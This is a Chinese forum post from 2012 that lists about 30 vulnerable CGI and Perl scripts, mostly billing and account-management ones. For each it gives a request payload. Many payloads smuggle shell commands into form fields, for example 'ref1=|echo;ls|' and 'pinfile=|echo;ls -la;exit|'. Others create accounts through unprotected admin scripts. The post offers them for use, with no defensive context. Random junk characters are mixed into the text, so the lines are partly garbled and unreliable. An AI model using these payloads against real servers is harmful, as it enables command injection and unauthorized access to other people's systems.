找回密码
 立即注册
查看: 3404|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================
2 H9 r1 ]6 H: M! ?& F, e; M8 j& A! G4 I
/smspass.pl8 g+ ~/ ]2 A+ N3 u2 _; a
username=username&password=password
% L) B- t  U* y  b3 I* P
0 V$ c- P( h9 u" @% Q/ ?/index.cgi' a# N' A( y9 s& N5 e" Y" {
wei=ren&gen=command
, a1 V% Z- m0 ]$ s# q( \7 n" \' W1 Y. @! y" @  G- A/ Q
/passmaster.cgi
$ E$ z+ k! `  H0 s" ]Action=Add&Username=Username&Password=Password& u& r2 S9 t  E7 i, \$ X

0 M0 |2 G  ^5 p- U* [! a$ p% ?" \/accountcreate.cgi
( M& c1 ~1 G$ v& k, Husername=username&password=password&ref1=|echo;ls|3 e' J+ N# j9 _- V8 O

; b4 Q8 O* l$ `" F& E+ V5 K/form.cgi9 Z. y' \8 [$ l& j
name=xxxx&email=email&subject=xxxx&response=|echo;ls|: s% W& y* A+ C2 S/ F* ]
5 \. f; C7 ?& @' q
/addusr.pl8 q5 w' V- ^: ?( D6 U; ]" o5 I# x
/cgi-bin/EuroDebit/addusr.pl( d5 I# ^' z( r7 u4 O' f
user=username&pass=Password&confirm=Password$ P& x% }3 `0 b- N2 F3 x3 h
- F9 ?% R9 u: T( E2 a7 N, }
/ccbill-local.asp  ^: S  w2 E) W/ C6 k. M; ?) i" f* \% I
post_values=username:password$ _& Z9 o/ j% m+ }% O
& S2 F5 [* d- F* l
/count.cgi5 m$ B+ e- ~3 z8 C% X& j" _
pinfile=|echo;ls -la;exit|0 f- c% o( M9 E3 r; y6 d( V* U% v

) W6 i4 g5 U! O: x/recon.cgi9 ~1 `! A9 Z% F; ~6 b
/recon.cgi?search
! z# Z* `8 H0 q! p6 c+ C) ysearchoption=1&searchfor=|echo;ls -al;exit|
3 y: k. T1 ^! _4 M/ {! ~2 F/ S6 M4 E" z. [8 O3 X! K
/verotelrum.pl
' }- y1 W7 G  h+ Z2 fvercode=username:password:dseegsow:add:amount<&30>
, j, q$ W! a- e5 n' J, n0 S) i/ `0 q5 R% h2 f5 g
/af.cgi; B( Y+ C- N) P. Z7 E. e/ H
_browser_out=|echo;ls -la;exit;|
" e2 Q8 p% w' F
' E5 g$ l& |8 K0 m  ]5 [/modify.cgi  z" o1 U+ b- Z! n
username=username&password=password&expire=30+ B; ^: w6 G' r; `" a3 X: o
1 `, V- r8 C% f/ |% N
/openjournal.cgi
% c: R8 f" E5 N  O9 L& Sedit=1&ct=2&go=|echo;ls -al;exit|
- ?% w( y3 ]3 f# a9 [- P3 N! R: @0 ~' t  d2 h* z
/gx9passwd.cgi
0 h& J. @5 H$ dcmd=ADD&user=username&pass=password
4 D8 G: @- `+ Q( V5 `/ ?/ c) M; y
) v% }+ A' ~$ U9 |. k0 \) t4 Z3 I5 r/probecontrol.cgi6 j) D: Y, Y4 C& w$ _$ o: Y: p
command=enable&username=username&password=password
2 a( K& P0 a& Q) Z: E5 g
2 I$ K  y# p! T3 _+ Z/recon.cgi. Z* k& M4 N; N7 b5 h& X
searchoption=3&searchfor=echo;ls -la;exit5 F2 V% b, N/ t+ r" X

# O, M/ a) G( P3 M& u/htadd.pl
$ l- D$ h) W- p' r$ I7 s& aconfigfile=|echo; ls -alt; exit1 D  ]. V( n, b6 w: q; _

: v% G' Q, V" C4 @1 v/gx9passwd.cgi% o+ n! h' S% w6 G5 _5 Q  w
cmd=ADD&user=username&pass=password
7 x; X$ s4 @8 A6 g4 q5 k- p3 G" R& [* P
/ibill*.pl
( j. N4 ~' ]# \, o" Preqtype=add&authpwd=authpwd&username=username&password=password
& q& W- M  V- Z, h
: r6 H2 w6 p% V: L# h. U. a1 B/cpay.cgi1 c7 `; Z1 b% U7 n$ d* ^
command=add_member&username=username(EMAIL)&password=password(DES)2 `1 d  @! B* B8 P9 c' X, Q/ \8 M

: I8 N! y1 X/ l; q3 G/globill_ut.cgi: H* S/ Z  c* x) G
do=add&username=username&password=password&wpassword=password
, n( y2 S  G- K( s% Y
# s, ]* x, A+ B/usercontrol.cgi
. F0 D; Z. Z8 c" e( rcommand=enable&username=USER&password=PASS
/ L5 \1 e$ z, t& j# a
: a6 y; W; @) W) a0 [/globoSALErum.cgi( M+ k& |4 b& Y1 N- }2 b" H
action=ADD&seccode=seccode&login=username&password=password
( q& R8 `- K4 D% C  b! B( r( X- I9 g
/addusr.pl
$ E  i0 f% O+ m' G! }0 wuser=USER&pass=PASS&confirm=PASS
0 Z" r$ S- W0 I5 j. E/ U1 h8 C: N$ x* C5 B6 i& T, w1 `
/pincount.cgi: Q3 b* U9 R4 V$ o& [. v; D' i5 r/ P/ c! v. L
/cgi-bin/mastergate/pincount.cgi
  J  Z( @! O7 {' R, _/ Lpinfile=|echo;pwd;exit|
  u+ S" E& i3 @+ c! Z1 ~, S: v
. o7 D8 c$ f8 l+ M- e/accountcreate.cgi
9 j. ?2 A( a" u6 Q& B' w/cgi-bin/gateway/accountcreate.cgi
& p3 f0 I' _- V7 B$ G; ~2 }$ Uusername=username&password=password&password2=password&ref1=|echo;ls -al;exit9 O7 Z  p0 F9 ~' v. D. d9 C- ?8 h; I, T

  {( E% m% f  c5 m" g" A/af.cgi
; L4 H, }; h8 ]6 E1 d/ z+ k/ h7 `& R' ^/env.cgi+ G: i- b6 P8 s# \1 j% @
ADD+;echo;pwd;exit
& {  }6 d  C$ T" m7 D; C7 L( e* g& L6 u/ j5 Z  B- \
/count.cgi
% ?: d- r  J1 h3 jpinfile=|echo;pwd;exit|
, c% K1 F0 w" y; T3 _6 d8 |% c. q7 T4 @4 r: m
/recon.cgi6 J1 u8 v1 S; }( r( @- a" a
searchoption=1&searchfor=|echo;ls%20-al;exit|
( B) _$ _+ r5 A  U% e# p7 ^) U) q/ v# [2 g. V9 Q1 s/ v! d& L
/add.cgi
: W! p" t1 h, M/ u0 \& Dusername=username&password=password&expire=30
6 c& h2 z9 {4 ~  f" ?
. Z- Y* r( ^$ m4 x6 Z) V==============================
1 `9 r; l% v" ]1 b5 I. Y8 h& k. p! |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表